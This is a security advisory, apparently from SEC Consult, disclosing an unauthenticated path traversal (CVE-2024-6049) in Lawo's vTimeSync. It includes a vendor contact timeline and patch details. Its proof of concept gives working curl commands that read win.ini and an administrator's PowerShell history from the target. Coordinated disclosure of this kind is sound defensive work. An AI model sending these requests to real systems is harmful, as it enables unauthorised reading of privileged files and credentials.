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## https://sploitus.com/exploit?id=PACKETSTORM:182347
SEC Consult Vulnerability Lab Security Advisory < 20241024-0 >  
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title: Unauthenticated Path Traversal Vulnerability  
product: Lawo AG - vsm LTC Time Sync (vTimeSync)  
vulnerable version: <4.5.6.0  
fixed version: 4.5.6.0  
CVE number: CVE-2024-6049  
impact: high  
homepage: https://docs.lawo.com/vsm-ip-broadcast-control-system/vsmgear-user-manual/discontinued-products/vsmltc  
found: 2024-01-11  
by: Sandro Einfeldt  
Dennis Jung  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
https://www.sec-consult.com  
  
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Vendor description:  
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"Lawo designs and manufactures video, audio, control and monitoring  
technology for broadcast, performing arts, installed sound and corporate  
applications. All products are developed in Germany and manufactured  
according to highest quality standards at the company's headquarters  
in the Rhine valley town of Rastatt, Germany."  
  
Source: https://lawo.com/company/about-us/  
  
  
Business recommendation:  
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The vendor provides a patch which should be installed immediately.  
  
SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.  
  
  
Vulnerability overview/description:  
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1) Unauthenticated Path Traversal Vulnerability (CVE-2024-6049)  
The web interface of vsm LTC Time Sync (vTimeSync) is vulnerable to a path  
traversal vulnerability. By sending a specially crafted HTTP request, an  
unauthenticated remote attacker can download arbitrary files from the vulnerable  
system. As a limitation, the exploitation is only possible if the requested file  
has a file extension, e.g. .exe or .txt.  
  
The web server is running with highest SYSTEM privileges per default, which  
enables an attacker to gain access to privileged files.  
  
  
Proof of concept:  
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1) Unauthenticated Path Traversal Vulnerability (CVE-2024-6049)  
To exploit the vulnerability it is sufficient to use the following curl-command  
to send a request to the vulnerable web server:  
  
curl http://$host:8033/.../.../.../.../.../.../.../.../.../<Path to file>  
  
For example, the following command can be used to request the default file  
win.ini:  
  
curl http://$host:8033/.../.../.../.../.../.../.../.../.../Windows/win.ini  
  
If the application is running with SYSTEM-privileges (default), the following  
command can be used to exfiltrate the Powershell history of the Windows  
administrator, which might leak sensitive information:  
  
curl http://$host:8033/.../.../.../.../.../.../.../.../.../Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt  
  
  
Vulnerable / tested versions:  
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The following version has been tested which was the latest version available  
at the time of the test:  
* 4.4.12.0  
  
According to the vendor, versions before 4.5 are affected and v4.5.6.0  
includes the fixes.  
  
  
Vendor contact timeline:  
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2024-01-22: Contacting vendor through info@lawo.com; no response  
2024-02-14: Contacting vendor again, adding support@lawo.com email  
2024-02-15: Vendor response (support), asking for details.  
2024-02-15: Asking where to submit the advisory, whether encryption  
is supported.  
2024-02-16: Vendor, submit either via email or JIRA; informing us  
that broadcasting software security levels are not that high  
as the network is usually not connected to the outside.  
2024-02-16: Submitting security advisory to vendor JIRA; explaining  
our severity estimation and risks by exposing the affected  
service.  
2024-02-20: Vendor has taken a look at the advisory, asking whether  
HTTPS would solve the issue.  
Telling vendor, that HTTPS won't fix the problem, describing  
the security issue again, providing link to OWASP path traversal  
page, etc.  
2024-02-21: Vendor cannot reproduce issue in Chrome browser.  
Explaining how we exploited the vulnerability.  
2024-03-11: Asking for a status update; no update from R&D yet, vendor will  
keep us updated.  
2024-04-09: Asking for a status update, whether vendor needs further support.  
2024-04-10: Vendor pinged their PM, will let us know as soon as feedback is  
available.  
2024-05-15: Vendor recently introduced "a login" for vTimeSync which only  
lets people with a username and a PW access the page. Vendor asks  
us whether this would cover the vulnerability.  
2024-05-23: Telling the vendor that a login does not fix the identified  
path traversal issue; no response.  
2024-06-17: Asking for a status update again.  
2024-06-17: Vendor support has forwarded our feedback internally.  
2024-09-25: Asking for a status update, CVE and affected/fixed version number.  
Preparing for release in October.  
2024-09-25: Vendor support still has no updates, asking product management and  
RnD team again.  
2024-09-26: Asking the vendor to keep us informed.  
2024-09-27: Vendor support will review the case next Wednesday.  
2024-10-10: Asking for a status update.  
Vendor has no news, this topic is in the R&D backlog, no date yet  
when development will be started.  
2024-10-11: Vendor states that the developers have already fixed the issue in  
the current release.  
2024-10-17: Asking for the version numbers (affected / patched).  
Vendor provides download to version 4.5.6.0 including changelog.  
Changelog contains information about security fix in version 4.4.13,  
but also changes regarding SSL/HTTPS and logon feature in 4.5.0 and 4.5.1.  
Asking the vendor again, in which version the issue has been  
fixed.  
Vendor informs us the problem is fixed after v4.5 and we should use  
the latest version.  
2024-10-21: Confirming version numbers, sending draft advisory to vendor and  
assigned CVE-2024-6049.  
2024-10-24: Coordinated release of security advisory.  
  
  
Solution:  
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The vendor provides a patch in versions after v4.5 which can be downloaded from the  
following URL, such as version 4.5.6.0.  
https://lawo.com/lawo-downloads/  
  
  
Workaround:  
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None  
  
  
Advisory URL:  
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https://sec-consult.com/vulnerability-lab/  
  
  
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EOF Sandro Einfeldt, Dennis Jung, Johannes Greil / @2024